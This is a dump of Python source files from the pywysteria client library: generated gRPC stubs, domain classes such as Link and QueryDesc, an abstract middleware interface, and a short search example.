[ { "alpha_fraction": 0.7164829969406128, "alphanum_fraction": 0.7214187383651733, "avg_line_length": 44.139896392822266, "blob_id": "6baf0c5361be5937e2a5f7bfb0c90a55fab8c18f", "content_id": "c669a9141dde6abdc0ea28df44a169733d178f6f", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17424, "license_type": "permissive", "max_line_length": 83, "num_lines": 386, "path": "/wysteria/middleware/wgrpc/stubs.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!\nimport grpc\n\nfrom wysteria.middleware.wgrpc.wysteria import grpc_pb2 as wysteria_dot_grpc__pb2\n\n\nclass WysteriaGrpcStub(object):\n # missing associated documentation comment in .proto file\n pass\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.CreateCollection = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/CreateCollection',\n request_serializer=wysteria_dot_grpc__pb2.Collection.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Id.FromString,\n )\n self.CreateItem = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/CreateItem',\n request_serializer=wysteria_dot_grpc__pb2.Item.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Id.FromString,\n )\n self.CreateVersion = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/CreateVersion',\n request_serializer=wysteria_dot_grpc__pb2.Version.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.IdAndNum.FromString,\n )\n self.CreateResource = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/CreateResource',\n request_serializer=wysteria_dot_grpc__pb2.Resource.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Id.FromString,\n )\n self.CreateLink = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/CreateLink',\n request_serializer=wysteria_dot_grpc__pb2.Link.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Id.FromString,\n )\n self.DeleteCollection = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/DeleteCollection',\n request_serializer=wysteria_dot_grpc__pb2.Id.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Text.FromString,\n )\n self.DeleteItem = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/DeleteItem',\n request_serializer=wysteria_dot_grpc__pb2.Id.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Text.FromString,\n )\n self.DeleteVersion = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/DeleteVersion',\n request_serializer=wysteria_dot_grpc__pb2.Id.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Text.FromString,\n )\n self.DeleteResource = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/DeleteResource',\n request_serializer=wysteria_dot_grpc__pb2.Id.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Text.FromString,\n )\n self.FindCollections = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/FindCollections',\n request_serializer=wysteria_dot_grpc__pb2.QueryDescs.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Collections.FromString,\n )\n self.FindItems = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/FindItems',\n request_serializer=wysteria_dot_grpc__pb2.QueryDescs.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Items.FromString,\n )\n self.FindVersions = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/FindVersions',\n 
request_serializer=wysteria_dot_grpc__pb2.QueryDescs.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Versions.FromString,\n )\n self.FindResources = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/FindResources',\n request_serializer=wysteria_dot_grpc__pb2.QueryDescs.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Resources.FromString,\n )\n self.FindLinks = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/FindLinks',\n request_serializer=wysteria_dot_grpc__pb2.QueryDescs.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Links.FromString,\n )\n self.PublishedVersion = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/PublishedVersion',\n request_serializer=wysteria_dot_grpc__pb2.Id.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Version.FromString,\n )\n self.SetPublishedVersion = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/SetPublishedVersion',\n request_serializer=wysteria_dot_grpc__pb2.Id.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Text.FromString,\n )\n self.UpdateVersionFacets = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/UpdateVersionFacets',\n request_serializer=wysteria_dot_grpc__pb2.IdAndDict.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Text.FromString,\n )\n self.UpdateItemFacets = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/UpdateItemFacets',\n request_serializer=wysteria_dot_grpc__pb2.IdAndDict.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Text.FromString,\n )\n self.UpdateCollectionFacets = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/UpdateCollectionFacets',\n request_serializer=wysteria_dot_grpc__pb2.IdAndDict.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Text.FromString,\n )\n self.UpdateResourceFacets = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/UpdateResourceFacets',\n request_serializer=wysteria_dot_grpc__pb2.IdAndDict.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Text.FromString,\n )\n self.UpdateLinkFacets = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/UpdateLinkFacets',\n request_serializer=wysteria_dot_grpc__pb2.IdAndDict.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Text.FromString,\n )\n\n\nclass WysteriaGrpcServicer(object):\n # missing associated documentation comment in .proto file\n pass\n\n def CreateCollection(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def CreateItem(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def CreateVersion(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def CreateResource(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def CreateLink(self, request, context):\n # missing associated 
documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def DeleteCollection(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def DeleteItem(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def DeleteVersion(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def DeleteResource(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def FindCollections(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def FindItems(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def FindVersions(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def FindResources(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def FindLinks(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def PublishedVersion(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def SetPublishedVersion(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def UpdateVersionFacets(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def UpdateItemFacets(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n 
context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def UpdateCollectionFacets(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def UpdateResourceFacets(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def UpdateLinkFacets(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_WysteriaGrpcServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'CreateCollection': grpc.unary_unary_rpc_method_handler(\n servicer.CreateCollection,\n request_deserializer=wysteria_dot_grpc__pb2.Collection.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Id.SerializeToString,\n ),\n 'CreateItem': grpc.unary_unary_rpc_method_handler(\n servicer.CreateItem,\n request_deserializer=wysteria_dot_grpc__pb2.Item.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Id.SerializeToString,\n ),\n 'CreateVersion': grpc.unary_unary_rpc_method_handler(\n servicer.CreateVersion,\n request_deserializer=wysteria_dot_grpc__pb2.Version.FromString,\n response_serializer=wysteria_dot_grpc__pb2.IdAndNum.SerializeToString,\n ),\n 'CreateResource': grpc.unary_unary_rpc_method_handler(\n servicer.CreateResource,\n request_deserializer=wysteria_dot_grpc__pb2.Resource.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Id.SerializeToString,\n ),\n 'CreateLink': grpc.unary_unary_rpc_method_handler(\n servicer.CreateLink,\n request_deserializer=wysteria_dot_grpc__pb2.Link.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Id.SerializeToString,\n ),\n 'DeleteCollection': grpc.unary_unary_rpc_method_handler(\n servicer.DeleteCollection,\n request_deserializer=wysteria_dot_grpc__pb2.Id.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Text.SerializeToString,\n ),\n 'DeleteItem': grpc.unary_unary_rpc_method_handler(\n servicer.DeleteItem,\n request_deserializer=wysteria_dot_grpc__pb2.Id.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Text.SerializeToString,\n ),\n 'DeleteVersion': grpc.unary_unary_rpc_method_handler(\n servicer.DeleteVersion,\n request_deserializer=wysteria_dot_grpc__pb2.Id.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Text.SerializeToString,\n ),\n 'DeleteResource': grpc.unary_unary_rpc_method_handler(\n servicer.DeleteResource,\n request_deserializer=wysteria_dot_grpc__pb2.Id.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Text.SerializeToString,\n ),\n 'FindCollections': grpc.unary_unary_rpc_method_handler(\n servicer.FindCollections,\n request_deserializer=wysteria_dot_grpc__pb2.QueryDescs.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Collections.SerializeToString,\n ),\n 'FindItems': grpc.unary_unary_rpc_method_handler(\n servicer.FindItems,\n request_deserializer=wysteria_dot_grpc__pb2.QueryDescs.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Items.SerializeToString,\n ),\n 'FindVersions': grpc.unary_unary_rpc_method_handler(\n 
servicer.FindVersions,\n request_deserializer=wysteria_dot_grpc__pb2.QueryDescs.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Versions.SerializeToString,\n ),\n 'FindResources': grpc.unary_unary_rpc_method_handler(\n servicer.FindResources,\n request_deserializer=wysteria_dot_grpc__pb2.QueryDescs.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Resources.SerializeToString,\n ),\n 'FindLinks': grpc.unary_unary_rpc_method_handler(\n servicer.FindLinks,\n request_deserializer=wysteria_dot_grpc__pb2.QueryDescs.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Links.SerializeToString,\n ),\n 'PublishedVersion': grpc.unary_unary_rpc_method_handler(\n servicer.PublishedVersion,\n request_deserializer=wysteria_dot_grpc__pb2.Id.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Version.SerializeToString,\n ),\n 'SetPublishedVersion': grpc.unary_unary_rpc_method_handler(\n servicer.SetPublishedVersion,\n request_deserializer=wysteria_dot_grpc__pb2.Id.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Text.SerializeToString,\n ),\n 'UpdateVersionFacets': grpc.unary_unary_rpc_method_handler(\n servicer.UpdateVersionFacets,\n request_deserializer=wysteria_dot_grpc__pb2.IdAndDict.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Text.SerializeToString,\n ),\n 'UpdateItemFacets': grpc.unary_unary_rpc_method_handler(\n servicer.UpdateItemFacets,\n request_deserializer=wysteria_dot_grpc__pb2.IdAndDict.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Text.SerializeToString,\n ),\n 'UpdateCollectionFacets': grpc.unary_unary_rpc_method_handler(\n servicer.UpdateCollectionFacets,\n request_deserializer=wysteria_dot_grpc__pb2.IdAndDict.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Text.SerializeToString,\n ),\n 'UpdateResourceFacets': grpc.unary_unary_rpc_method_handler(\n servicer.UpdateResourceFacets,\n request_deserializer=wysteria_dot_grpc__pb2.IdAndDict.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Text.SerializeToString,\n ),\n 'UpdateLinkFacets': grpc.unary_unary_rpc_method_handler(\n servicer.UpdateLinkFacets,\n request_deserializer=wysteria_dot_grpc__pb2.IdAndDict.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Text.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'wysteria_grpc.WysteriaGrpc', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n" }, { "alpha_fraction": 0.5365239381790161, "alphanum_fraction": 0.5541561841964722, "avg_line_length": 18.850000381469727, "blob_id": "e2e1ac9a49c143f0895adb2b1101cda802022c2d", "content_id": "9977ee3fd2f1cddceab48e10dadf469d27e55b7e", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 397, "license_type": "permissive", "max_line_length": 78, "num_lines": 20, "path": "/examples/06/main.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\nExample06: Limits & offsets\n\"\"\"\n\nimport wysteria\n\n\ndef main():\n client = wysteria.Client()\n with client:\n search = client.search()\n search.params(name=\"default\")\n\n for i in range(0, 2):\n found = search.find_resources(limit=1, offset=i)\n print(\"found\", len(found), \"=>\", found[0].name, found[0].location)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.712195098400116, "alphanum_fraction": 0.712195098400116, "avg_line_length": 16.672412872314453, "blob_id": "8973425e415902bbd8b8fd1b4bcaa4cdcbc8344f", "content_id": 
"eb43eeadc13aa02c37784a6bb883d038541de75c", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1025, "license_type": "permissive", "max_line_length": 96, "num_lines": 58, "path": "/wysteria/domain/__init__.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"Domain module contains python classes used throughout the repo.\n\n\nFiles\n-----\n\nbase.py\n Contains abstract / parent classes that are used within the module\n\ncollection.py\n Contains Collection class\n\nitem.py\n Contains Item class\n\nversion.py\n Contains Version class\n\nlink.py\n Contains Link class\n\nresource.py\n Contains Resource class\n\nquery_desc.py\n Contains QueryDesc class. This is used by the Search class but isn't intended to be directly\n exposed.\n\n\nExported\n--------\n\nAs you might expect, this exposes only the domain object classes:\n - Collection\n - Item\n - Version\n - Resource\n - Link\n - QueryDesc\n\n\"\"\"\n\nfrom wysteria.domain.collection import Collection\nfrom wysteria.domain.item import Item\nfrom wysteria.domain.version import Version\nfrom wysteria.domain.resource import Resource\nfrom wysteria.domain.link import Link\nfrom wysteria.domain.query_desc import QueryDesc\n\n\n__all__ = [\n \"Collection\",\n \"Item\",\n \"Version\",\n \"Resource\",\n \"Link\",\n \"QueryDesc\",\n]\n" }, { "alpha_fraction": 0.513744056224823, "alphanum_fraction": 0.514691948890686, "avg_line_length": 22.70786476135254, "blob_id": "4805f97704d0761ea8cb1e053d64633d035ebda0", "content_id": "304933cacb8ba868ea70c36132879637348ae671", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2110, "license_type": "permissive", "max_line_length": 75, "num_lines": 89, "path": "/wysteria/domain/link.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\n\n\"\"\"\nfrom wysteria.domain.base import WysBaseObj\nfrom wysteria.domain.query_desc import QueryDesc\n\n\nclass Link(WysBaseObj):\n def __init__(self, conn, **kwargs):\n super().__init__(**kwargs)\n self.__conn = conn\n self._name = kwargs.get(\"name\")\n self._src = kwargs.get(\"src\")\n self._dst = kwargs.get(\"dst\")\n\n def __eq__(self, other):\n if not isinstance(other, Link):\n raise NotImplementedError()\n\n return all([\n self.id == other.id,\n self.name == other.name,\n self.source == other.source,\n self.destination == other.destination,\n ])\n\n def _encode(self) -> dict:\n \"\"\"Return dict representation of this link\n\n Returns:\n dict\n \"\"\"\n return {\n \"name\": self.name,\n \"src\": self.source,\n \"uri\": self._uri,\n \"dst\": self.destination,\n \"facets\": self.facets,\n }\n\n def _fetch_uri(self) -> str:\n \"\"\"Fetch uri from remote server.\n\n Returns:\n str\n \"\"\"\n result = self.__conn.find_links([QueryDesc().id(self.id)], limit=1)\n if result:\n return result[0].uri\n return \"\"\n\n def _update_facets(self, facets: dict):\n \"\"\"Call wysteria to update this link with the given facets\n\n Args:\n facets: dict\n \"\"\"\n self.__conn.update_link_facets(self.id, facets)\n\n @property\n def name(self) -> str:\n \"\"\"Return the name of this link\n\n Returns:\n str\n \"\"\"\n return self._name\n\n @property\n def source(self) -> str:\n \"\"\"Return the Id of the source object for this link.\n\n - Note that this could be either a Version or an Item Id.\n\n Returns:\n str\n \"\"\"\n return self._src\n\n @property\n def destination(self) -> str:\n 
\"\"\"Return the Id of the destination object for this link.\n\n - Note that this could be either a Version or an Item Id.\n\n Returns:\n str\n \"\"\"\n return self._dst\n" }, { "alpha_fraction": 0.5819269418716431, "alphanum_fraction": 0.5819269418716431, "avg_line_length": 25.224090576171875, "blob_id": "fd250314a7c4d0e2cb2756352853d816a8a01313", "content_id": "86df7a62eb3fba578a0dc25c4b3757f74d3a49b2", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9362, "license_type": "permissive", "max_line_length": 77, "num_lines": 357, "path": "/wysteria/middleware/abstract_middleware.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import abc\n\nfrom wysteria import constants as consts\nfrom wysteria import errors\n\n\nclass WysteriaConnectionBase(metaclass=abc.ABCMeta):\n \"\"\"\n Abstract class to represent clientside wysteria middleware\n\n Pretty much a python clone of the wysteria/common/middleware client\n interface. Valid python clients should subclass from this.\n \"\"\"\n\n @staticmethod\n def translate_server_exception(msg):\n \"\"\"Turn a wysteria error string into a python exception.\n\n Args:\n msg: error string from wysteria\n\n Raises:\n AlreadyExistsError\n NotFoundError\n InvalidInputError\n IllegalOperationError\n ServerUnavailableError\n Exception\n \"\"\"\n if consts.ERR_ALREADY_EXISTS in msg:\n raise errors.AlreadyExistsError(msg)\n elif consts.ERR_NOT_FOUND in msg:\n raise errors.NotFoundError(msg)\n elif consts.ERR_ILLEGAL in msg:\n raise errors.IllegalOperationError(msg)\n elif any([consts.ERR_INVALID in msg, \"ffjson error\" in msg]):\n raise errors.InvalidInputError(msg)\n elif consts.ERR_NOT_SERVING in msg:\n raise errors.ServerUnavailableError(msg)\n\n # something very unexpected happened\n raise Exception(msg)\n\n @abc.abstractmethod\n def connect(self):\n \"\"\"Connect to remote host(s)\n\n Raises:\n Exception if unable to establish connection to remote host(s)\n \"\"\"\n pass\n\n @abc.abstractmethod\n def close(self):\n \"\"\"Close remote connection\"\"\"\n pass\n\n @abc.abstractmethod\n def find_collections(self, query, limit=None, offset=None):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.wysteria.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.wysteria.Collection\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def find_items(self, query, limit=None, offset=None):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.wysteria.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.wysteria.Item\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def find_versions(self, query, limit=None, offset=None):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.wysteria.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.wysteria.Version\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def find_resources(self, query, limit=None, offset=None):\n \"\"\"Query server & return type 
appropriate matching results\n\n Args:\n query ([]domain.wysteria.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.wysteria.Resource\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def find_links(self, query, limit=None, offset=None):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.wysteria.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.wysteria.Link\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def get_published_version(self, oid):\n \"\"\"Item ID to find published version for\n\n Args:\n oid (str): item id to find published version for\n\n Returns:\n wysteria.domain.Version or None\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def publish_version(self, oid):\n \"\"\"Version ID mark as published\n\n Args:\n oid (str): version id to publish\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def update_collection_facets(self, oid, facets):\n \"\"\"Update collection with matching ID with given facets\n\n Args:\n oid (str): collection ID to update\n facets (dict): new facets (these are added to existing facets)\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def update_version_facets(self, oid, facets):\n \"\"\"Update version with matching ID with given facets\n\n Args:\n oid (str): version ID to update\n facets (dict): new facets (these are added to existing facets)\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def update_item_facets(self, oid, facets):\n \"\"\"Update item with matching ID with given facets\n\n Args:\n oid (str): item ID to update\n facets (dict): new facets (these are added to existing facets)\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def update_resource_facets(self, oid, facets):\n \"\"\"Update resource with matching ID with given facets\n\n Args:\n oid (str): resource ID to update\n facets (dict): new facets (these are added to existing facets)\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def update_link_facets(self, oid, facets):\n \"\"\"Update link with matching ID with given facets\n\n Args:\n oid (str): link ID to update\n facets (dict): new facets (these are added to existing facets)\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def create_collection(self, collection):\n \"\"\"Create collection with given name, return ID of new collection\n\n Args:\n collection (wysteria.domain.Collection): input collection\n\n Returns:\n str\n \"\"\"\n pass\n \n @abc.abstractmethod\n def create_item(self, item):\n \"\"\"Create item with given values, return ID of new item\n\n Args:\n item (wysteria.domain.Item): input item\n\n Returns:\n str\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def create_version(self, version):\n \"\"\"Create item with given values, return ID of new version\n\n Args:\n version (wysteria.domain.Version): input version\n\n Returns:\n str, int\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n \n 
@abc.abstractmethod\n def create_resource(self, resource):\n \"\"\"Create item with given values, return ID of new resource\n\n Args:\n resource (wysteria.domain.Resource): input resource\n\n Returns:\n str\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n \n @abc.abstractmethod\n def create_link(self, link):\n \"\"\"Create item with given values, return ID of new link\n\n Args:\n link (wysteria.domain.Link): input link\n\n Returns:\n str\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def delete_collection(self, oid):\n \"\"\"Delete the matching obj type with the given id\n\n Args:\n oid (str): id of obj to delete\n\n Raises:\n Exception if deletion fails / network error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def delete_item(self, oid):\n \"\"\"Delete the matching obj type with the given id\n\n (Links will be deleted automatically)\n\n Args:\n oid (str): id of obj to delete\n\n Raises:\n Exception if deletion fails / network error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def delete_version(self, oid):\n \"\"\"Delete the matching obj type with the given id\n\n (Links will be deleted automatically)\n\n Args:\n oid (str): id of obj to delete\n\n Raises:\n Exception if deletion fails / network error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def delete_resource(self, oid):\n \"\"\"Delete the matching obj type with the given id\n\n Args:\n oid (str): id of obj to delete\n\n Raises:\n Exception if deletion fails / network error\n \"\"\"\n pass\n" }, { "alpha_fraction": 0.5061246156692505, "alphanum_fraction": 0.5063021183013916, "avg_line_length": 21.991836547851562, "blob_id": "72a6cd8152999ed64b063227d5e287d245aa5ac4", "content_id": "b521a753f07a85e112239ee783d494d4364c95a7", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5633, "license_type": "permissive", "max_line_length": 98, "num_lines": 245, "path": "/wysteria/domain/query_desc.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\n\n\"\"\"\nimport copy\n\n\nclass QueryDesc:\n \"\"\"\n QueryDesc (\"Query Description\") represents a single query param sent to a wysteria server.\n\n - An object must match all of the set params in order to be considered a match.\n - Multiple QueryDesc sent to Wysteria will return results that match any of the individual\n QueryDesc objects.\n - A single search request with a list of QueryDesc is sent looking for objects of a given\n type. 
If the desired object type lacks a property for which a QueryDesc asks for, that\n field is ignored for the purpose of the search.\n That is, if you searched for all collections and matched on {some params} which included\n \"ResourceLocation\", the \"ResourceLocation\" requirement will be ignored as Collections do not\n possess this property.\n\n \"\"\"\n def __init__(self):\n self._id = \"\"\n self._uri = \"\"\n self._parent = \"\"\n self._versionnumber = 0\n self._itemtype = \"\"\n self._variant = \"\"\n self._facets = {}\n self._name = \"\"\n self._resourcetype = \"\"\n self._location = \"\"\n self._linkdst = \"\"\n self._linksrc = \"\"\n\n @property\n def is_valid(self) -> bool:\n \"\"\"Return if at least one of our search params is set.\n\n ToDo: Consider not allowing resource_type / name queries without\n a parent or id set.\n\n Returns:\n bool\n \"\"\"\n return any([\n self._id,\n self._uri,\n self._parent,\n self._versionnumber,\n self._itemtype,\n self._variant,\n self._facets,\n self._name,\n self._resourcetype,\n self._location,\n self._linksrc,\n self._linkdst\n ])\n\n def encode(self) -> dict:\n \"\"\"Return dict representation of this object.\n\n Returns:\n dict\n \"\"\"\n return {\n \"id\": self._id,\n \"uri\": self._uri,\n \"parent\": self._parent,\n \"versionnumber\": self._versionnumber,\n \"itemtype\": self._itemtype,\n \"variant\": self._variant,\n \"facets\": copy.copy(self._facets),\n \"name\": self._name,\n \"resourcetype\": self._resourcetype,\n \"location\": self._location,\n \"linksrc\": self._linksrc,\n \"linkdst\": self._linkdst,\n }\n\n def id(self, val: str):\n \"\"\"Match on object by it's Id.\n\n Args:\n val: an Id to match on\n\n 